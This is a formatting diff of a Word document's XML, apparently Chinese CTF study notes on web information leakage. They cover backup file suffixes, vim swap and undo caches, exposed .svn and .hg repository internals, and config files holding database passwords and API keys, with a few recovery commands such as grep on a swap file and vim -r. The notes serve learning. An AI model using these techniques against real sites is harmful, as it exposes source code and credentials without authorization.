-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>网站源码包</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>：</w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>网站源码包：</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3500,17 +3427,9 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>后缀变体</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>：</w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>后缀变体：</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3663,17 +3582,9 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>编辑器缓存</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>（vim 系列，见 2.3）</w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>编辑器缓存（vim 系列，见 2.3）</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3683,17 +3594,9 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>系统元数据</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>：</w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>系统元数据：</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3741,17 +3644,9 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>配置密钥</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>：</w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>配置密钥：</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3814,17 +3709,9 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>IDE 工程</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>：</w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>IDE 工程：</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3887,32 +3774,24 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>为什么 `.bak` 能读源码</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>：服务器按</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>最后扩展名</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>决定解析。</w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">为什么 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>.bak</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 能读源码：服务器按最后扩展名决定解析。</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3970,17 +3849,9 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>成因</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve">：在 web 目录 </w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">成因：在 web 目录 </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4020,17 +3891,9 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>正确做法</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>：</w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>正确做法：</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4070,7 +3933,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>两代结构：</w:t>
@@ -4083,7 +3945,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>≤ 1.6</w:t>
@@ -4163,7 +4024,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>≥ 1.7</w:t>
@@ -4243,7 +4103,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>1.7+ 打法（实测）：</w:t>
@@ -4316,11 +4175,18 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`refcount = 0` = 没有任何工作副本文件引用它 = 被删掉的旧版本残留。</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>refcount = 0</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = 没有任何工作副本文件引用它 = 被删掉的旧版本残留。</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4330,17 +4196,24 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>⚠️ 只看 `NODES` 会漏</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve">：被删的文件 </w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">⚠️ 只看 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>NODES</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 会漏：被删的文件 </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4380,7 +4253,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>四行版：</w:t>
@@ -4483,17 +4355,9 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>成因</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve">：在 web 目录 </w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">成因：在 web 目录 </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4533,7 +4397,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>三个关键文件：</w:t>
@@ -4545,11 +4408,11 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`.hg/last-message.txt`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>.hg/last-message.txt</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4590,11 +4453,11 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`.hg/store/fncache`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>.hg/store/fncache</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4627,11 +4490,11 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`.hg/dirstate`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>.hg/dirstate</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4688,7 +4551,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>⚠️ 两个致命细节：</w:t>
@@ -4701,10 +4563,39 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>① 文件名要编码：`_` → `__`（下划线是转义符）</w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>① 文件名要编码：</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>_</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> → </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>__</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>（下划线是转义符）</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4775,7 +4666,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>② revlog 里的数据带标记字节</w:t>
@@ -4820,18 +4710,18 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`'u'` (0x75)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>：原文</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>'u'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (0x75)：原文</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4840,18 +4730,18 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`'x'` (0x78)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>：zlib</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>'x'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (0x78)：zlib</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4860,11 +4750,11 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`0x00`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>0x00</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4881,7 +4771,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>最简打法：</w:t>
@@ -4970,17 +4859,9 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>成因</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>：</w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>成因：</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5005,17 +4886,9 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>内容常含</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>：数据库密码、API Key、JWT Secret、Redis 密码。</w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>内容常含：数据库密码、API Key、JWT Secret、Redis 密码。</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5025,32 +4898,9 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>注意</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve">：有些值是 </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>base64 编码</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve">的，要 </w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">注意：有些值是 base64 编码的，要 </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5105,17 +4955,9 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>是什么</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>：</w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>是什么：</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5140,17 +4982,9 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>为什么</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve">：用 </w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">为什么：用 </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5205,17 +5039,9 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>为什么危害大</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>：</w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>为什么危害大：</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5285,17 +5111,9 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>备份文件 6 类</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>（见 2.2.2）。</w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>备份文件 6 类（见 2.2.2）。</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5305,7 +5123,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>vim 缓存 3 类 8 种：</w:t>
@@ -5318,7 +5135,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>swap</w:t>
@@ -5430,7 +5246,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>undo</w:t>
@@ -5483,7 +5298,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>backup</w:t>
@@ -5536,7 +5350,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>swap 的三种取法（实测对比）：</w:t>
@@ -5548,26 +5361,18 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>**`grep -ao "flag{[^}]*}" .index.php.swp`</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve">：⭐⭐⭐ </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>完整**</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>grep -ao "flag{[^}]*}" .index.php.swp</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>：⭐⭐⭐ 完整</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5576,11 +5381,11 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`strings`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>strings</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5596,26 +5401,18 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`vim -r`</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve">：⚠️ </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>可能只写了一半 → 恢复残缺</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>vim -r</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>：⚠️ 可能只写了一半 → 恢复残缺</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5626,21 +5423,11 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:i/>
           <w:color w:val="555555"/>
           <w:sz w:val="20"/>
         </w:rPr>
-        <w:t>认知修正</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:i/>
-          <w:color w:val="555555"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve">：不是"必须 </w:t>
+        <w:t xml:space="preserve">认知修正：不是"必须 </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5701,10 +5488,39 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>在 web 目录 `svn checkout`，`.svn` 留在 web 根。</w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">在 web 目录 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
